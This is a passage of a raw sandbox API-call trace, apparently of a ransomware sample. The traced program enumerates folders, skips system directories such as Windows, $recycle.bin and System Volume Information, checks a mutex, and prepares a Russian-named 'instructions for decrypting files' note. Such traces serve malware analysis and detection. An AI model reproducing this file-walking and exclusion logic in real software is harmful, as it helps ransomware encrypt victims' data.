cAlternateFileName="鳜W䱠@堬X企@\x18㟬X\x18\x8f")) returned 0xffffffff [0109.199] GetLastError () returned 0x2 [0109.199] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.199] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="reserv㧰X ") returned 6 [0109.199] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\ition\\") returned 7 [0109.199] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Restore", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, 
dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="鳜W䱠@텤X企@\x18㧴X\x18\x97")) returned 0xffffffff [0109.200] GetLastError () returned 0x2 [0109.200] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.200] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="restoreX ") returned 7 [0109.200] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.200] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.200] GlobalUnlock (hMem=0x45000c) returned 0 [0109.200] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.200] GlobalLock (hMem=0x450004) returned 0x593998 [0109.200] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.200] GlobalUnlock (hMem=0x45000c) returned 0 [0109.200] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.200] GlobalUnlock (hMem=0x450004) returned 0 [0109.200] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.201] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0109.201] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aaa8, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0109.201] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.201] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0109.201] 
MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 46 [0109.201] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.201] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0109.201] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab68, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0109.201] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.201] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0109.201] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b10, cbMultiByte=11, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0109.202] GlobalLock (hMem=0x450004) returned 0x591988 [0109.202] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.202] GlobalUnlock (hMem=0x450004) returned 0 [0109.202] GlobalLock (hMem=0x450004) returned 0x591988 [0109.202] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.202] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.202] GlobalUnlock (hMem=0x450004) returned 0 [0109.202] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.202] GlobalUnlock (hMem=0x45000c) returned 0 [0109.202] 
CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.202] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab68, cbMultiByte=15, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0109.202] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.202] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=11, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0109.202] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.203] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0109.203] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.203] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab68, cbMultiByte=18, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 18 [0109.203] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: 
lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.203] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 28 [0109.203] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.203] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=10, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 10 [0109.204] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.204] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 8 [0109.204] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.204] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0109.204] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.204] SHGetMalloc (in: 
ppMalloc=0x18edcc | out: ppMalloc=0x18edcc*=0x767666bc) returned 0x0 [0109.204] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18edc8 | out: ppidl=0x18edc8) returned 0x0 [0109.205] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0109.208] SysReAllocStringLen (in: pbstr=0x18ee50*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18ee50*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0109.208] IMalloc:Free (This=0x767666bc, pv=0x578208) [0109.208] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0109.208] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0109.208] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.208] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.208] GlobalUnlock (hMem=0x45000c) returned 0 [0109.208] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.208] GlobalLock (hMem=0x450004) returned 0x593998 [0109.208] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.208] GlobalUnlock (hMem=0x45000c) returned 0 [0109.208] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.208] GlobalUnlock (hMem=0x450004) returned 0 [0109.208] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*.*", lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b020 [0109.208] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0109.209] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 1 [0109.209] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc8 | out: lpLocalFileTime=0x18edc8) returned 1 [0109.209] FileTimeToDosDateTime (in: lpFileTime=0x18edc8, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.209] GlobalLock (hMem=0x450004) returned 0x591988 [0109.209] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.209] GlobalUnlock (hMem=0x450004) returned 0 [0109.209] GlobalLock (hMem=0x450004) returned 0x591988 [0109.209] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.209] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.209] GlobalUnlock (hMem=0x450004) returned 0 [0109.209] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.209] GlobalUnlock (hMem=0x45000c) returned 0 [0109.209] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.209] CharLowerBuffW (in: lpsz="MSOEURO.DLL", cchLength=0xb | out: lpsz="msoeuro.dll") returned 0xb [0109.209] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", 
cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.209] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.209] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", 
cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.210] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", cchWideChar=63, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", lpUsedDefaultChar=0x0) returned 63 [0109.210] CharLowerBuffW (in: lpsz=".DLL", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllShared\\EURO\\MSOEURO.DLL", lpUsedDefaultChar=0x0) returned 4 [0109.210] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, 
ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 0 [0109.210] GetLastError () returned 0x12 [0109.210] FindClose (in: hFindFile=0x58b020 | out: hFindFile=0x58b020) returned 1 [0109.210] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.210] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.210] GlobalUnlock (hMem=0x45000c) returned 0 [0109.210] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.211] GlobalLock (hMem=0x450004) returned 0x593998 [0109.211] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.211] GlobalUnlock (hMem=0x45000c) returned 0 [0109.211] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.211] GlobalUnlock (hMem=0x450004) returned 0 [0109.211] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*.*", lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b020 [0109.211] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc8 | out: lpLocalFileTime=0x18edc8) returned 1 [0109.211] FileTimeToDosDateTime (in: lpFileTime=0x18edc8, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.211] GlobalLock (hMem=0x450004) returned 0x591988 [0109.211] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.211] GlobalUnlock (hMem=0x450004) returned 0 [0109.211] GlobalLock (hMem=0x450004) returned 0x591988 [0109.211] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.211] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.211] 
GlobalUnlock (hMem=0x450004) returned 0 [0109.211] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.211] GlobalUnlock (hMem=0x45000c) returned 0 [0109.211] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.211] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0109.211] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.211] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.212] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.212] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.212] GlobalUnlock (hMem=0x45000c) returned 0 [0109.212] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.212] GlobalLock (hMem=0x450004) returned 0x593998 [0109.212] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.212] GlobalUnlock (hMem=0x45000c) returned 0 [0109.212] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.212] GlobalUnlock (hMem=0x450004) returned 0 [0109.212] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.212] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, 
ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 1 [0109.212] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.212] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.212] GlobalLock (hMem=0x450004) returned 0x591988 [0109.212] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.212] GlobalUnlock (hMem=0x450004) returned 0 [0109.212] GlobalLock (hMem=0x450004) returned 0x591988 [0109.212] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.212] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.212] GlobalUnlock (hMem=0x450004) returned 0 [0109.212] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.212] GlobalUnlock (hMem=0x45000c) returned 0 [0109.212] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.212] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 0 [0109.213] GetLastError () returned 0x12 [0109.213] FindClose (in: hFindFile=0x58b020 | out: hFindFile=0x58b020) returned 1 [0109.213] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, 
ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Filters", cAlternateFileName="")) returned 1 [0109.213] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f104 | out: lpLocalFileTime=0x18f104) returned 1 [0109.213] FileTimeToDosDateTime (in: lpFileTime=0x18f104, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0109.213] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.213] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.213] GlobalUnlock (hMem=0x45000c) returned 0 [0109.213] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.213] GlobalLock (hMem=0x450004) returned 0x593998 [0109.213] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.213] GlobalUnlock (hMem=0x45000c) returned 0 [0109.213] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.213] GlobalUnlock (hMem=0x450004) returned 0 [0109.213] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.214] GlobalLock (hMem=0x450004) returned 0x591988 [0109.214] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.214] GlobalUnlock (hMem=0x450004) returned 0 [0109.214] GlobalLock (hMem=0x450004) returned 0x591988 [0109.214] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.214] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.214] GlobalUnlock (hMem=0x450004) returned 0 [0109.214] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.214] GlobalUnlock (hMem=0x45000c) returned 0 [0109.214] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.214] SysReAllocStringLen (in: pbstr=0x18f104*=0x0, psz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters", len=0x36 | out: pbstr=0x18f104*="C:\\Program 
